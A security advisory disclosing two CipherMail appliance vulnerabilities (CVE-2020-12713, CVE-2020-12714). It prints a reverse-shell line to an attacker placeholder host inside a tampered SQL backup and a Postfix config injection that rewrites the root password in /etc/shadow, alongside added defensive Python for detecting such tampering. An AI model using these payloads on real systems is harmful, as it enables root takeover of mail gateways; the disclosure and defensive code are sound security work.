CipherMail Community Virtual Appliance 4.6.2 Code Execution

CipherMail Community Virtual Appliance version 4.6.2 suffers from remote command execution and file injection vulnerabilities.

MD5 | 1e03b7ce73404f389184d11c6489d8e8

CipherMail Multiple Vulnerabilities

1. Advisory Information

Title: CipherMail Email Encryption Gateway Community Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2020-0008
Advisory URL:
Date published: 2020-05-28
Date of last update: 2020-05-28
Vendors contacted: CipherMail
Release mode: Coordinated release

2. Vulnerability Information

Class: Improper Control of Generation of Code (Code Injection) [CWE-94], Improper Input Validation [CWE-20], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2020-12713, CVE-2020-12714

3. Vulnerability Description

CipherMail is a global cybersecurity company based in the Netherlands focused on email security products. CipherMail creates both commercial solutions and sponsors open source tools. CipherMail Email Encryption Gateway can be deployed with any email system and uses multiple encryption standards to provide message integrity and protection against interception. Both an enterprise edition and an open source community version are available. [1]

Two vulnerabilities were found in version 4.6.2 of the Community Virtual Appliance, which would allow a remote attacker with access to the management console and administrator rights to execute arbitrary privileged commands on the operating system.

4. Vulnerable Packages

CipherMail Community Virtual Appliance version 4.6.2.

Other products and versions might be affected, but have not yet been tested.

5. Vendor Information, Solutions, and Workarounds

The following versions have been published to correct the vulnerabilities: CipherMail Gateway 4.8 and Webmail Messenger 3.2

Patch instructions for older releases are also available.

6. Credits

This vulnerability was discovered and researched by Iván Koiffman, Fernando Catoira and Fernando Diaz from Core Security Consulting Services.

The publication of this advisory was coordinated by Pablo A. Zurro from the CoreLabs Advisories Team.

7. Technical Description / Proof of Concept Code

CipherMail Community Virtual Appliance is an open source virtual appliance version of the Email Encryption Gateway. It is designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to manage domains, users, DLP policies, and other services.

Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to obtain command execution on the system.

7.1 Remote Command Execution Via Backup Restore

[CVE-2020-12713] The CipherMail Web Management console provides a system backup functionality, accessible only to users with the administrator role, which allows them to back up or restore the system settings. This capability is affected by a remote code execution vulnerability.

The following proof of concept demonstrates the vulnerability:

1. First, the create backup functionality, which is present in the path /admin/backup/create, must be invoked in order to download the system settings. This feature downloads a compressed file containing SQL statements and some other files.

2. The obtained file should then be decompressed. At the end of the SQL statements file, the word system can then be added, followed by the command that is going to be executed. Below is a snippet using system to obtain a reverse shell:

-- MySQL dump 10.16 Distrib 10.2.21-MariaDB, for Linux (x86_64)
-- Host: localhost Database: djigzo
-- ------------------------------------------------------
-- Server version 10.2.21-MariaDB
-- Dumping data for table `cm_users`

/*!40000 ALTER TABLE `cm_users` DISABLE KEYS */;
INSERT INTO `cm_users` VALUES (1,'[email protected]',5);
/*!40000 ALTER TABLE `cm_users` ENABLE KEYS */;


system bash -i >& /dev/tcp/[Attacker IP]/[Attacker Port] 0>&1
-- Dump completed on 2019-03-28 18:48:05

3. It is then necessary to recompress the recently modified file along with the other ones within a new tar.gz file and execute the restore backup functionality from the administration console.

4. Finally, the command can be executed in the backend server and a reverse shell should be obtained. The reverse shell is executed under the context of the user running the database server.
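
A pre-restore check for the tampering described in steps 2 and 3, as an added example (not code from the advisory or from CipherMail): it scans every file in a backup archive for lines that begin with a mysql client command such as system or its short form \!, which the client acts on locally instead of sending to the server. The member name backup.sql, the helper names and the sample dump are constructed assumptions, and the check is a line-based heuristic for mysqldump-style files.

```python
import io
import re
import tarfile

# mysql client commands that act on the client host rather than the server:
# shell execution and local file reads/writes. Long names are matched
# case-insensitively, backslash short forms exactly.
CLIENT_CMD = re.compile(r"\s*(?:(?i:system|source|tee|pager|edit)\b|\\[!.TPe])")

def scan_sql(text):
    """Return (line_number, line) for each line that starts with a client command."""
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if CLIENT_CMD.match(line)]

def scan_backup(archive_bytes):
    """Scan every regular file in a tar.gz backup; return {member_name: findings}."""
    report = {}
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        for member in tar:
            if not member.isfile():
                continue
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            hits = scan_sql(text)
            if hits:
                report[member.name] = hits
    return report

def make_backup(files):
    """Build a tar.gz in memory from {name: bytes}; used only for the demo."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

# Constructed sample data; "backup.sql" is a hypothetical member name.
CLEAN_DUMP = (
    "-- Dumping data for table `cm_users`\n"
    "/*!40000 ALTER TABLE `cm_users` DISABLE KEYS */;\n"
    "INSERT INTO `cm_users` VALUES (1,'user@example.com',5);\n"
)
TAMPERED_DUMP = CLEAN_DUMP + "system id\n-- Dump completed\n"

if __name__ == "__main__":
    archive = make_backup({"backup.sql": TAMPERED_DUMP.encode()})
    for name, hits in scan_backup(archive).items():
        for lineno, line in hits:
            print(f"REJECT {name}:{lineno}: {line}")
```

A backup with any finding should be refused rather than cleaned, since the file has been edited after export.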

7.2 Configuration File Injection Leading to Code Execution as Root

[CVE-2020-12714] The CipherMail Web Management console provides a functionality accessible by users with an administrator's role to manage Postfix. It is possible to edit Postfix’s configuration file within the CipherMail Web Management console and add a "BCC Address for all Messages". This configuration parameter is written verbatim to the appliance's Postfix configuration file.

The following proof of concept demonstrates the vulnerability:

The next four lines should be added in order to replace the root password in the system:

[ Postfix configuration file]
always_bcc = [email protected]
multi_instance_wrapper=sed -i /root:/c\root:KoVhDRK7oesZg:17926:0:99999:7::: /etc/shadow

After the new file is saved, the Postfix service is automatically restarted and the file pointed to by multi_instance_wrapper is executed.

In this proof of concept, we were able to execute a sed command to set the password of the root user to pentest. Note that we used DES and not bcrypt because the $ symbol is not allowed by syntax (syntax is limited and some symbols are not allowed, including "<", ">", "|", among others). To generate a password in DES using bash, we first executed the following command:

$ mkpasswd -m des
Password: pentest

As shown above, we used the obtained string KoVhDRK7oesZg as part of the sed command to set the password of the root user to pentest.

It is now possible to establish an SSH connection (the SSH server is enabled by default) and log in as the root user with the new password set.
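
The class of flaw in 7.2, as an added example (a Python model, not CipherMail's code, whose implementation the advisory does not show): render_unsafe copies the field verbatim into a main.cf-style file, render_safe accepts only a single mailbox address, and parameters lists the parameter names the resulting file defines so they can be compared with a baseline. The function names, the address pattern and the sample values are assumptions.

```python
import re

# Conservative allowlist for one mailbox address. fullmatch() is used so that
# a trailing newline cannot slip through the way it can with a "$" anchor.
ADDRESS = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

def render_unsafe(bcc):
    """Model of the flaw: the form field is written verbatim."""
    return f"always_bcc = {bcc}\n"

def render_safe(bcc):
    """Write the line only if the field is exactly one address."""
    if not ADDRESS.fullmatch(bcc):
        raise ValueError("BCC address rejected: not a single mailbox address")
    return f"always_bcc = {bcc}\n"

def parameters(main_cf):
    """Parameter names defined by main.cf-style text: 'name = value' lines;
    blank lines, '#' comments and whitespace-led continuation lines are skipped."""
    names = []
    for line in main_cf.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or line[0].isspace():
            continue
        names.append(line.split("=", 1)[0].strip())
    return names

# Constructed input: a field value carrying a second parameter after a newline.
# The wrapper path is a placeholder.
INJECTED = "bcc@example.com\nmulti_instance_wrapper = /constructed/placeholder"

if __name__ == "__main__":
    print(parameters(render_unsafe(INJECTED)))   # two parameters from one field
    try:
        render_safe(INJECTED)
    except ValueError as exc:
        print(exc)
```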

8. Report Timeline

2020-04-07 - Vulnerability discovered by CoreLabs.

2020-04-30 - First contact made with the vendor.

2020-04-30 - Answer received and advisory draft provided to CipherMail.

2020-04-30 - Vulnerabilities recognized by the vendor.

2020-05-21 - CVEs requested and received from Mitre.

2020-05-28 - Fix and release changes published by vendor.

2020-05-28 - Advisory published.

9. References



10. About CoreLabs

CoreLabs, the research center of Core Security, A HelpSystems Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at

11. About Core Security, A HelpSystems Company

Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].

12. Disclaimer

The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:
